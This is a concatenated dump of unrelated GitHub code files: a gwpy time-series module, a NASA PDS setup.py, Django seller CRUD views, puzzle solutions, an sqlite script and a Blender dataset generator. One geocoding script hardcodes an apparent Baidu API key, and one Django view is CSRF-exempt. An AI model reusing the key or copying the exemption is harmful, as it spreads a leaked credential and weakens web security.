channel names\",\n ) from exc\n\n # find frames\n cache = io_datafind.find_urls(\n observatory,\n frametype,\n start,\n end,\n on_gaps=\"error\" if pad is None else \"warn\",\n )\n if not cache:\n raise RuntimeError(\n f\"No {observatory}-{frametype} URLs found for \"\n f\"[{start}, {end})\",\n )\n\n # read data\n new = cls.read(\n cache,\n names,\n start=start,\n end=end,\n pad=pad,\n scaled=scaled,\n nproc=nproc,\n verbose=verbose,\n **readargs,\n )\n\n # map back to user-given channel name and append\n out.append(type(new)(\n (key, new[chan]) for (key, chan) in zip(clist, names)\n ))\n return out\n\n @classmethod\n def get(cls, channels, start, end, pad=None, scaled=None,\n dtype=None, verbose=False, allow_tape=None, **kwargs):\n \"\"\"Retrieve data for multiple channels from frames or NDS\n\n This method dynamically accesses either frames on disk, or a\n remote NDS2 server to find and return data for the given interval\n\n Parameters\n ----------\n channels : `list`\n required data channels.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n frametype : `str`, optional\n name of frametype in which this channel is stored, by default\n will search for all required frame types\n\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect.\n\n nproc : `int`, optional, default: `1`\n number of parallel processes to use, serial process by\n default.\n\n allow_tape : `bool`, optional, default: `None`\n allow the use of frames that are held on tape, default is `None`\n to attempt to allow the `TimeSeries.fetch` method to\n intelligently select a server that doesn't use tapes for\n data storage (doesn't always work), but to eventually allow\n retrieving data from tape if required\n\n verbose : `bool`, optional\n print verbose output about data access progress, if ``verbose``\n is specified as a string, this defines the prefix for the\n progress meter\n\n **kwargs\n other keyword arguments to pass to either\n `TimeSeriesBaseDict.find` (for direct GWF file access) or\n `TimeSeriesBaseDict.fetch` for remote NDS2 access\n \"\"\"\n # separate non-None nds2-only keywords here\n nds_kw = {}\n for key in ('host', 'port', 'connection', 'type', 'dtype'):\n val = kwargs.pop(key, None)\n if val is not None:\n nds_kw[key] = val\n\n # try and find from frames\n if not nds_kw:\n if verbose:\n gprint(\"Attempting to access data from frames...\")\n try:\n return cls.find(channels, start, end, pad=pad, scaled=scaled,\n verbose=verbose,\n allow_tape=allow_tape or False,\n **kwargs)\n except (ImportError, RuntimeError, ValueError) as exc:\n if verbose:\n gprint(str(exc), file=sys.stderr)\n gprint(\"Failed to access data from frames, trying NDS...\")\n\n # remove kwargs for .find()\n for key in ('nproc', 'frametype', 'frametype_match', 'observatory'):\n kwargs.pop(key, None)\n kwargs.update(nds_kw) # replace nds keywords\n\n # otherwise fetch from NDS\n try:\n return cls.fetch(channels, start, end, pad=pad, scaled=scaled,\n dtype=dtype, allow_tape=allow_tape,\n verbose=verbose, **kwargs)\n except RuntimeError as exc:\n # if all else fails, try and get each 
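# `get` above separates the NDS2-only keywords from the rest before deciding
# between local frames and a remote server. The kwarg-partitioning idiom on
# its own (hypothetical helper name):
def split_nds_kwargs(kwargs):
    nds_only = ('host', 'port', 'connection', 'type', 'dtype')
    nds_kw = {k: kwargs.pop(k) for k in nds_only if kwargs.get(k) is not None}
    return nds_kw, kwargs

nds_kw, rest = split_nds_kwargs({'host': 'nds.example.org', 'pad': 0.0})
print(nds_kw)   # {'host': 'nds.example.org'}
print(rest)     # {'pad': 0.0}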
channel individually\n if len(channels) == 1:\n raise\n else:\n if verbose:\n gprint(str(exc), file=sys.stderr)\n gprint(\"Failed to access data for all channels as a \"\n \"group, trying individually:\")\n return cls(\n (c, cls.EntryClass.get(c, start, end, pad=pad,\n scaled=scaled, dtype=dtype,\n allow_tape=allow_tape,\n verbose=verbose, **kwargs))\n for c in channels)\n\n @classmethod\n def from_nds2_buffers(cls, buffers, scaled=None, copy=True, **metadata):\n \"\"\"Construct a new dict from a list of `nds2.buffer` objects\n\n **Requires:** |nds2|_\n\n Parameters\n ----------\n buffers : `list` of `nds2.buffer`\n the input NDS2-client buffers to read\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect.\n\n copy : `bool`, optional\n if `True`, copy the contained data array to new to a new array\n\n **metadata\n any other metadata keyword arguments to pass to the `TimeSeries`\n constructor\n\n Returns\n -------\n dict : `TimeSeriesDict`\n a new `TimeSeriesDict` containing the data from the given buffers\n \"\"\"\n tsd = cls()\n for buf in buffers:\n tsd[buf.channel.name] = tsd.EntryClass.from_nds2_buffer(\n buf, scaled=scaled, copy=copy, **metadata)\n return tsd\n\n def plot(self, label='key', method='plot', figsize=(12, 4),\n xscale='auto-gps', **kwargs):\n \"\"\"Plot the data for this `TimeSeriesBaseDict`.\n\n Parameters\n ----------\n label : `str`, optional\n labelling system to use, or fixed label for all elements\n Special values include\n\n - ``'key'``: use the key of the `TimeSeriesBaseDict`,\n - ``'name'``: use the :attr:`~TimeSeries.name` of each element\n\n If anything else, that fixed label will be used for all lines.\n\n **kwargs\n all other keyword arguments are passed to the plotter as\n appropriate\n \"\"\"\n kwargs.update({\n \"method\": method,\n \"label\": label,\n })\n\n # make plot\n from ..plot import Plot\n\n if kwargs.get(\"separate\", False):\n plot = Plot(*self.values(), **kwargs)\n else:\n plot = Plot(self.values(), **kwargs)\n\n # update labels\n artmap = {'plot': 'lines', 'scatter': 'collections'}\n artists = [x for ax in plot.axes for\n x in getattr(ax, artmap.get(method, 'lines'))]\n for key, artist in zip(self, artists):\n if label.lower() == 'name':\n lab = self[key].name\n elif label.lower() == 'key':\n lab = key\n else:\n lab = label\n artist.set_label(lab)\n\n return plot\n\n def step(self, label='key', where='post', figsize=(12, 4),\n xscale='auto-gps', **kwargs):\n \"\"\"Create a step plot of this dict.\n\n Parameters\n ----------\n label : `str`, optional\n labelling system to use, or fixed label for all elements\n Special values include\n\n - ``'key'``: use the key of the `TimeSeriesBaseDict`,\n - ``'name'``: use the :attr:`~TimeSeries.name` of each element\n\n If anything else, that fixed label will be used for all lines.\n\n **kwargs\n all other keyword arguments are passed to the plotter as\n appropriate\n \"\"\"\n kwargs.setdefault(\n \"drawstyle\",\n \"steps-{}\".format(where),\n )\n tmp = type(self)()\n for key, series in self.items():\n tmp[key] = series.append(series.value[-1:], inplace=False)\n\n return tmp.plot(label=label, figsize=figsize, xscale=xscale,\n **kwargs)\n\n\n# -- TimeSeriesBaseList -------------------------------------------------------\n\nclass TimeSeriesBaseList(list):\n \"\"\"Fancy list representing a list of `TimeSeriesBase`\n\n The `TimeSeriesBaseList` provides an easy way to collect and organise\n `TimeSeriesBase` for a single `Channel` over multiple 
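# `step` above pads every series with a repeat of its final sample before
# plotting with drawstyle='steps-post'; without that pad the last step of
# the staircase would not be drawn. A matplotlib-only sketch of the trick:
import numpy
import matplotlib.pyplot as plt

x = numpy.arange(5)
y = numpy.array([1, 3, 2, 4, 0])
plt.plot(numpy.append(x, x[-1] + 1),   # one extra sample on the right
         numpy.append(y, y[-1]),
         drawstyle='steps-post')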
segments.\n\n Parameters\n ----------\n *items\n any number of `TimeSeriesBase`\n\n Returns\n -------\n list\n a new `TimeSeriesBaseList`\n\n Raises\n ------\n TypeError\n if any elements are not `TimeSeriesBase`\n \"\"\"\n EntryClass = TimeSeriesBase\n\n def __init__(self, *items):\n \"\"\"Initialise a new list\n \"\"\"\n super().__init__()\n for item in items:\n self.append(item)\n\n @property\n def segments(self):\n \"\"\"The `span` of each series in this list\n \"\"\"\n from ..segments import SegmentList\n return SegmentList([item.span for item in self])\n\n def append(self, item):\n if not isinstance(item, self.EntryClass):\n raise TypeError(\"Cannot append type '%s' to %s\"\n % (type(item).__name__, type(self).__name__))\n super().append(item)\n return self\n append.__doc__ = list.append.__doc__\n\n def extend(self, item):\n item = TimeSeriesBaseList(*item)\n super().extend(item)\n extend.__doc__ = list.extend.__doc__\n\n def coalesce(self):\n \"\"\"Merge contiguous elements of this list into single objects\n\n This method implicitly sorts and potentially shortens this list.\n \"\"\"\n self.sort(key=lambda ts: ts.t0.value)\n i = j = 0\n N = len(self)\n while j < N:\n this = self[j]\n j += 1\n if j < N and this.is_contiguous(self[j]) == 1:\n while j < N and this.is_contiguous(self[j]):\n try:\n this = self[i] = this.append(self[j])\n except ValueError as exc:\n if 'cannot resize this array' in str(exc):\n this = this.copy()\n this = self[i] = this.append(self[j])\n else:\n raise\n j += 1\n else:\n self[i] = this\n i += 1\n del self[i:]\n return self\n\n def join(self, pad=None, gap=None):\n \"\"\"Concatenate all of the elements of this list into a single object\n\n Parameters\n ----------\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n gap : `str`, optional, default: `'raise'`\n what to do if there are gaps in the data, one of\n\n - ``'raise'`` - raise a `ValueError`\n - ``'ignore'`` - remove gap and join data\n - ``'pad'`` - pad gap with zeros\n\n If `pad` is given and is not `None`, the default is ``'pad'``,\n otherwise ``'raise'``.\n\n Returns\n -------\n series : `gwpy.types.TimeSeriesBase` subclass\n a single series containing all data from each entry in this list\n\n See also\n --------\n TimeSeries.append\n for details on how the individual series are concatenated together\n \"\"\"\n if not self:\n return self.EntryClass(numpy.empty((0,) * self.EntryClass._ndim))\n self.sort(key=lambda t: t.epoch.gps)\n out = self[0].copy()\n for series in self[1:]:\n out.append(series, gap=gap, pad=pad)\n return out\n\n def __getslice__(self, i, j):\n return type(self)(*super().__getslice__(i, j))\n\n def __getitem__(self, key):\n if isinstance(key, slice):\n return type(self)(\n *super().__getitem__(key))\n return super().__getitem__(key)\n\n def copy(self):\n \"\"\"Return a copy of this list with each element copied to new memory\n \"\"\"\n out = type(self)()\n for series in self:\n out.append(series.copy())\n return out\n","repo_name":"gwpy/gwpy","sub_path":"gwpy/timeseries/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":56118,"program_lang":"python","lang":"en","doc_type":"code","stars":358,"dataset":"github-code","pt":"3"} +{"seq_id":"10467737610","text":"from setuptools import setup, find_packages\nimport xml.dom, xml.dom.minidom\nimport os.path\n\n# Maven 2\n# -------\n# \n# This is a lonely Python project living in a hostile Java world, so we have to get\n# project metadata from a 
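# `coalesce` above sorts the list by start time and appends contiguous
# neighbours into a single series. The same merge on bare (start, end)
# spans, taking "contiguous" to mean one span ends exactly where the next
# begins:
def coalesce_spans(spans):
    if not spans:
        return []
    spans = sorted(spans)
    merged = [spans[0]]
    for start, end in spans[1:]:
        if start == merged[-1][1]:              # contiguous: extend in place
            merged[-1] = (merged[-1][0], end)
        else:
            merged.append((start, end))
    return merged

print(coalesce_spans([(4, 6), (0, 2), (2, 4)]))   # [(0, 6)]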
Maven 2 POM_ living alongside setup.py\n#\n# .. _POM: http://maven.apache.org/pom.html\n\ndef _text(node):\n    a = []\n    _text0(node, a)\n    return u''.join(a)\ndef _text0(node, a):\n    if node.nodeType in (xml.dom.Node.CDATA_SECTION_NODE, xml.dom.Node.TEXT_NODE):\n        a.append(node.nodeValue)\n    for child in node.childNodes:\n        _text0(child, a)\ndef _valueFor(nodeName, parentName, doc):\n    return [_text(i) for i in pomDoc.getElementsByTagName(nodeName) if i.parentNode.nodeName == parentName][0]\npomDoc = xml.dom.minidom.parse(os.path.join(os.path.dirname(__file__), 'pom.xml'))\n_description = _valueFor('description', 'project', pomDoc)\n_url = _valueFor('url', 'project', pomDoc)\n_author = _valueFor('name', 'developer', pomDoc)\n_authorEmail = _valueFor('email', 'developer', pomDoc)\n\n# The version is no longer included in pom.xml, but in ../pom.xml. Although to be completely\n# Maven-subservient, we should look it up by the parent pom description. But screw that.\nparentPOM = os.path.join(os.path.dirname(__file__), '..', 'pom.xml')\nif os.path.isfile(parentPOM):\n    pomDoc = xml.dom.minidom.parse(parentPOM)\n    _version = _valueFor('version', 'project', pomDoc)\nelse:\n    _version = '1.8.1'\n\n\n# Package data\n# ------------\n\n_name = 'pds.registry'\n_downloadURL = 'ftp://pds.nasa.gov/pub/toplevel/2010/registry/pds.registry-' + _version + '.tar.gz'\n_maintainer = 'Sean Kelly'\n_maintainerEmail = 'sean.kelly@jpl.nasa.gov'\n_license = 'Proprietary'\n_namespaces = ['pds', 'pds.registry']\n_zipSafe = True\n_keywords = 'ebxml registry information model client nasa pds'\n_testSuite = 'pds.registry.tests.test_suite'\n_entryPoints = {}\n_requirements = [\n    'setuptools',\n    'anyjson',\n]\n_testRequirements = [\n    'zope.testing',\n]\n_classifiers = [\n    'Development Status :: 2 - Pre-Alpha',\n    'Environment :: Web Environment',\n    'Intended Audience :: Science/Research',\n    'License :: Other/Proprietary License',\n    'Operating System :: OS Independent',\n    'Programming Language :: Python',\n    'Topic :: Scientific/Engineering :: Astronomy',\n    'Topic :: Scientific/Engineering :: Atmospheric Science',\n    'Topic :: System :: Distributed Computing',\n]\n_ignoredModules = [\n    'bootstrap',\n    'setup',\n]\n\n# Setup Metadata\n# --------------\n\ndef _read(*rnames):\n    return open(os.path.join(os.path.dirname(__file__), *rnames)).read()\n\n_header = '*' * len(_name) + '\\n' + _name + '\\n' + '*' * len(_name)\n_longDescription = _header + '\\n\\n' + _read('README.txt') + '\\n\\n' + _read('docs', 'INSTALL.txt') + '\\n\\n' \\\n    + _read('docs', 'HISTORY.txt') + '\\n\\n' + _read('docs', 'LICENSE.txt')\nopen('doc.txt', 'w').write(_longDescription)\n\nsetup(\n    author=_author,\n    author_email=_authorEmail,\n    classifiers=_classifiers,\n    description=_description,\n    download_url=_downloadURL,\n    entry_points=_entryPoints,\n    extras_require={'test': _testRequirements},\n    include_package_data=True,\n    install_requires=_requirements,\n    keywords=_keywords,\n    license=_license,\n    long_description=_longDescription,\n    name=_name,\n    namespace_packages=_namespaces,\n    packages=find_packages('src'),\n    package_dir={'': 'src'},\n    test_suite=_testSuite,\n    url=_url,\n    version=_version,\n    zip_safe=_zipSafe,\n)\n","repo_name":"NASA-PDS/planetarydata.org","sub_path":"src/pds.registry/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"2347899897","text":"'''\n2022.10.3\n11866 - Josephus Problem 0\n'''\n\nfrom collections import deque\n\nN, K = 
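# The setup.py above extracts metadata from a Maven pom.xml by collecting
# text nodes and filtering elements by their parent tag. A compact sketch of
# the same lookup using only the standard library; the XML snippet and
# helper name are illustrative (and, unlike _text0, this version only joins
# direct text children):
import xml.dom.minidom

doc = xml.dom.minidom.parseString(
    '<project><name>demo</name>'
    '<developer><name>Jane</name></developer></project>')

def value_for(tag, parent, doc):
    for node in doc.getElementsByTagName(tag):
        if node.parentNode.nodeName == parent:
            return ''.join(t.nodeValue for t in node.childNodes
                           if t.nodeType == t.TEXT_NODE)

print(value_for('name', 'developer', doc))   # Jane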
map(int, input().split())\nnums = deque([])\nfor i in range(1, N+1):\n nums.append(i)\n\nprint('<', end='')\nwhile nums:\n for i in range(K-1):\n nums.append(nums[0])\n nums.popleft()\n print(nums.popleft(), end='')\n if nums:\n print(', ', end='')\nprint('>')\n\n","repo_name":"irenee-14/Python","sub_path":"class2/n11866.py","file_name":"n11866.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10255916165","text":"#coding:utf-8\n__author__ = \"ila\"\nimport requests\ndef geocoding(ak,lat, lon):\n lat_lon = '{},{}'.format(lat, lon)\n # address=str(i[0])+','+str(i[1])\n url = 'http://api.map.baidu.com/geocoder?output=json&key={}&location={}'.format(ak, str(lat_lon))\n r = requests.get(url)\n contents = r.json()\n print(contents)\n address = contents.get(\"result\").get(\"addressComponent\")\n # print(address)\n return address\n\nif __name__=='__main__':\n address=geocoding(\"QvMZVORsL7sGzPyTf5ZhawntyjiWYCif\",24.2943350100,116.1287866600)\n print(address)","repo_name":"shuangyulin/python023_lvyou","sub_path":"djangomg217/util/locate.py","file_name":"locate.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"27040566517","text":"from vendedor.forms import AdminForm\nfrom django.http.response import JsonResponse,HttpResponseRedirect\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render \nfrom django.views.decorators.csrf import csrf_protect, csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom vendedor.models import *\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView\n\ndef admin_list(request):\n context = {\n 'title':'Lista de vendedores',\n 'categories' : Vendedor.objects.all()\n }\n return render(request, 'admin/list.html',context)\n\nclass AdminListView(ListView):\n model = Vendedor\n template_name = 'admin/list.html'\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n \n def post(self, request, *args, **kwargs):\n data = {}\n try:\n data = Vendedor.objects.get(pk=request.POST['id']).toJSON()\n\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Lista de vendedores'\n context['create_url'] = reverse_lazy('admini:AdminCreateView')\n context['list_url'] = reverse_lazy('admini:AdminListView')\n context['entity'] = 'venta'\n return context\n\nclass AdminCreateView(CreateView):\n model = Vendedor\n form_class = AdminForm \n template_name = 'admin/create.html'\n success_url = reverse_lazy('admini:AdminListView')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Registrar un vendedor'\n context['entity'] = 'venta'\n context['list_url'] = reverse_lazy('admini:AdminListView')\n context['action'] = 'add'\n return context\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n action = request.POST['action']\n if action == 'add':\n form = self.get_form()\n data = form.save()\n else:\n data['error'] = 'no ha ingresado ninguna opcion'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\"\"\" def post(self, request, *args, **kwargs):\n print(request.POST)\n form = AdminForm(request.POST)\n if form.is_valid():\n 
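# The Josephus loop above moves K-1 people to the back one append/popleft
# pair at a time; deque.rotate() expresses the same permutation in a single
# call. A standalone variant returning the elimination order as a list:
from collections import deque

def josephus(n, k):
    people, order = deque(range(1, n + 1)), []
    while people:
        people.rotate(-(k - 1))        # skip k-1 people in one step
        order.append(people.popleft())
    return order

print(josephus(7, 3))   # [3, 6, 2, 7, 5, 1, 4]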
form.save()\n return HttpResponseRedirect(self.success_url)\n self.object = None\n context = self.get_context_data( **kwargs)\n context['form']= form\n return render(request, self.template_name, context)\n\"\"\"\n\nclass AdminUpdateView(UpdateView):\n model = Vendedor\n form_class = AdminForm \n template_name = 'admin/create.html'\n success_url = reverse_lazy('admini:AdminListView')\n\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n action = request.POST['action']\n if action == 'edit':\n form = self.get_form()\n data = form.save()\n else:\n data['error'] = 'no ha ingresado ninguna opcion'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n #print(self.object)\n #print(self.get_object())\n context = super().get_context_data(**kwargs)\n context['title'] = 'Editar un vendedor'\n context['entity'] = 'venta'\n context['list_url'] = reverse_lazy('admini:AdminListView')\n context['action'] = 'edit'\n return context\n\nclass AdminDeleteView(DeleteView):\n model = Vendedor\n form_class = AdminForm \n template_name = 'admin/delete.html'\n success_url = reverse_lazy('admini:AdminListView')\n\n #@method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n self.object.delete()\n print(request.POST)\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n #print(self.object)\n #print(self.get_object())\n context = super().get_context_data(**kwargs)\n context['title'] = 'Eliminar un vendedor'\n context['entity'] = 'venta'\n context['list_url'] = reverse_lazy('admini:AdminListView')\n return context","repo_name":"arthurFRC396/Proyecto2---AS","sub_path":"AGUAMARINA/app/vendedor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39610288307","text":"with open(\"input.txt\", 'r') as f:\n directions = f.readline()\n\norientation = [\"N\", \"E\", \"S\", \"W\"]\n\nstart_x, start_y = 0, 0\n\nx, y = start_x, start_y\n\ndx = {\"N\": 0, \"E\": 1, \"S\": 0, \"W\": -1}\ndy = {\"N\": 1, \"E\": 0, \"S\": -1, \"W\": 0}\n\ndirections = directions.split(\" \")\n\nvisited = {}\n\nvisited_twice = []\n\nfor direction in directions:\n \n direction = direction.strip(\",\")\n\n if direction[0] == \"L\":\n orientation = orientation[-1:] + orientation[:-1]\n elif direction[0] == \"R\":\n orientation = orientation[1:] + orientation[:1]\n \n for _ in range(int(direction[1:])):\n x += dx[orientation[0]] \n y += dy[orientation[0]]\n \n located = str(x) + ',' + str(y)\n\n if located in visited.keys():\n visited_twice.append(located)\n else:\n visited[located] = None\n \na, b = visited_twice[0].split(\",\") \n \nprint(\"Part One:\", abs(int(x)-start_x) + abs(int(y)-start_y))\nprint(\"Part Two:\", abs(int(a)-start_x) + abs(int(b)-start_y))","repo_name":"jareddrayton/Advent-of-Code","sub_path":"advent_of_code_2016/day-01/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24812711210","text":"class Solution:\n def validUtf8(self, data: 
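# The class-based views above route AJAX requests through a POST "action"
# field and always answer with JSON, tucking any failure message under an
# "error" key. The dispatch skeleton in isolation; handle_post is a
# hypothetical function, and the real views validate and save a Django form
# instead of setting a flag:
from django.http import JsonResponse

def handle_post(request):
    data = {}
    try:
        if request.POST.get('action') == 'add':
            data['ok'] = True          # a real view would save a form here
        else:
            data['error'] = 'no valid action supplied'
    except Exception as e:
        data['error'] = str(e)
    return JsonResponse(data)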
List[int]) -> bool:\n # Can do string manipulation and solve easily\n # Can save space and use bit manipulation instead\n \n # Initialize variables\n n_bytes = 0\n \n # This mask is used to check the second to left most bit in following bytes because they need\n # to be 0. So this with AND should result in 0.\n mask2 = 1 << 6\n \n for num in data:\n # This mask used for left most value\n mask = 1 << 7\n \n # So if we're dealing with the first byte in the sequence\n if n_bytes == 0:\n # While the mask returns 1 (aka the value we're checking is 1) or less than 5 bytes\n while mask & num and n_bytes < 5:\n # Increase n_bytes\n n_bytes += 1\n # Shift mask to right by 1.\n mask = mask >> 1\n \n # If we're dealing with a 1 byte char\n if n_bytes == 0:\n continue\n \n # If invalid (invalid if one counted or more than 4 bytes. One byte starts with 0, not 1)\n if n_bytes == 1 or n_bytes > 4:\n return False\n \n # Otherwise, we're dealing with a byte that isn't the first in the sequence\n else:\n # Just need to check if two leftmost bits == 10\n # If not, it's not valid\n if not (num & mask and not (num & mask2)):\n return False\n \n n_bytes -= 1\n \n # Outside the for loop, we need to make sure no bytes are left. \n return n_bytes == 0","repo_name":"PigsGoMoo/LeetCode","sub_path":"utf-8-validation/utf-8-validation.py","file_name":"utf-8-validation.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7159642772","text":"import sqlite3\r\n\r\ncx = sqlite3.connect(\"db.sqlite3\")\r\ncu=cx.cursor()\r\n\r\n# cu.execute(\"SELECT * FROM sensor_temperature\")\r\n# print(cu.fetchall())\r\n\r\n# cu.execute(\"DROP TABLE sensor_temperature\")\r\n\r\n# cu.execute(\"CREATE TABLE sensor_temperature(captime varchar(20),captemperature varchar(10))\")\r\n# cu.execute(\"CREATE TABLE sensor_temperature(id int PRIMARY KEY NOT NULL, captime varchar(20),captemperature varchar(10))\")\r\n\r\n\r\n# cu.execute(\"SELECT * FROM sensor_sensors\")\r\n# print(cu.fetchall())\r\n\r\n# cu.execute('DELETE FROM sensor_sensors WHERE id>50')\r\n# print(1)\r\ncu.execute(\"SELECT * FROM sensor_sensors where id=782\")\r\nprint(cu.fetchall())\r\n\r\n","repo_name":"ylf2002/sensor_display","sub_path":"sensordisplayProject/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6698288866","text":"import sys\nimport bpy\nimport random\nimport os\nimport string\nimport time\n\nsys.path.append('.')\n\nfrom transformations import transform\nfrom camera import change_resolution, bounding_box, change_focal_length\nfrom objOps import delete, copy\nfrom utils import init, progress\nfrom hdri import change_HDRI\nfrom data import images_per_class, save_dir, hdris_dir, filename_size, prob_many_objs, prob_add_obj\nfrom ground import adjust_ground\nfrom color import shift_color\n\ndef random_filename():\n \"\"\"\n Genrate a random string \n \"\"\"\n letters = string.ascii_lowercase + string.ascii_uppercase\n name = ''.join(random.choice(letters) for _ in range(filename_size))\n return f'{save_dir}/{name}'\n\ndef intersersct(obj1,obj2):\n \"\"\"\n Check if two obejct intersect from the camera view perspective\n \"\"\"\n # Boundingbox the objects\n o1p1, o1p2 = bounding_box(obj1)\n o2p1, o2p2 = bounding_box(obj2)\n return o1p1[0] < o2p2[0] and o1p2[0] > o2p1[0] and o1p1[1] < o2p2[1] and o1p2[1] > o2p1[1] \n\ndef 
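# The validator above leans on two masks: 1 << 7 walks the leading 1-bits
# that encode the sequence length, and 1 << 6 checks that continuation
# bytes look like 10xxxxxx. A tiny demonstration of both checks on a real
# UTF-8 sequence:
def leading_ones(byte):
    mask, count = 1 << 7, 0
    while byte & mask:
        count += 1
        mask >>= 1
    return count

data = list('€'.encode('utf-8'))    # [226, 130, 172], a 3-byte sequence
assert leading_ones(data[0]) == 3   # first byte: 1110xxxx
for b in data[1:]:
    assert b & (1 << 7) and not b & (1 << 6)   # continuation: 10xxxxxx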
choose_objs(collection):\n \"\"\"\n collection: main collection to use\n\n Choose an object mesh from a collection \n returns a list of chosed obejcts and a list of collctions names that have been used\n \"\"\"\n # add the principal collection to be used\n collections_names = [collection.name]\n\n # Chooose a mesh from collection\n render_objs = [random.choice(collection.all_objects).name]\n # Add others collections with randomly with probabily of prob_many_objs\n if random.random() < prob_many_objs:\n for i in collections:\n # Choose collection with probabliy of prob_add_obj\n if random.random() < prob_add_obj:\n # Choose a random object mesh from the random collection selected\n render_objs.append(random.choice(i.all_objects).name)\n # Add the collection selectd\n collections_names.append(i.name)\n return render_objs, collections_names\n\ndef use_collection(collection):\n \"\"\"\n collection: main collection to be used for the new render image\n \"\"\"\n # Random resolution\n change_resolution()\n # Random zoom\n change_focal_length()\n # Adjust the ground to cameras view\n adjust_ground()\n # Choose the objects ot be render\n possible_objs, possible_collections = choose_objs(collection)\n objects = []\n materials = []\n collections = []\n # Set a random hdri image\n img = change_HDRI(random.choice(hdris))\n for i, coll in zip(possible_objs, possible_collections):\n # Copy the current object, so won't be altred for next renders\n obj_copy = copy(i)\n # Set the object to be visible\n obj_copy.hide_render = False\n # make random transformations\n transform(obj_copy)\n # Change the color of the materials in the object mesh \n materials += shift_color(obj_copy, bpy.context.scene.objects[i].users_collection[0].name) \n b = True\n # Try 10 times to randomly acomodate the object mesh inside the view of the camera with no intersections\n attempts = 10\n for j in range(attempts):\n # check the object dosen't intersect with others from camera's perspective\n for o in objects:\n b = b and not intersersct(o, obj_copy)\n # If there is no intersection append the object\n if b:\n collections.append(coll)\n objects.append(obj_copy)\n break\n # If the object intersects with others make another random trasnfomation\n # Unless its the try 9, then the object can not be fitted\n elif j != (attempts -1):\n # set the copied object mesh the original data like loation, rotation, scale\n obj_copy.data = bpy.context.scene.objects[i].data.copy()\n # ranodm transfomration\n transform(obj_copy)\n b = True\n # If the object was not placed delete it\n if not b:\n delete(obj_copy)\n # Render and save the coordenates\n save(objects, collections)\n # Dispose copied objects \n for obj in objects:\n obj.hide_render = True\n delete(obj)\n # Remove hdri image\n bpy.data.images.remove(img)\n # Dispose copied materials\n for material in materials:\n bpy.data.materials.remove(material)\n\ndef save(objs, colls):\n \"\"\" \n objs: Array with the blender object meshes used\n colls: Array with the collection's names used\n\n Save a new render image and a txt file with the coordenates (YOLO)\n of the objects contained in the image \n \"\"\"\n # Random file name\n filename = random_filename()\n # Ensure the file name dosen't exist already\n while os.path.exists(f'{filename}.jpg'):\n filename = random_filename()\n # Set the path for saving the render image\n bpy.context.scene.render.filepath = f'{filename}'\n # Save the txt file with the coordenates of the image\n with open (f'{filename}.txt', 'w') as f:\n ln = len(objs)\n for i in 
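# `use_collection` above places each mesh by rejection sampling: apply a
# random transform, test the camera-space bounding box against everything
# already placed, and retry up to a fixed number of attempts before giving
# up on the object. The bare loop on 1-D intervals, with a hypothetical
# overlap test standing in for intersersct():
import random

def place(existing, width=0.1, attempts=10):
    for _ in range(attempts):
        start = random.random()
        candidate = (start, start + width)
        if all(candidate[1] <= a or candidate[0] >= b for a, b in existing):
            return candidate           # fits without touching anything placed
    return None                        # could not be fitted; caller discards it

spans = []
for _ in range(5):
    spot = place(spans)
    if spot:
        spans.append(spot)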
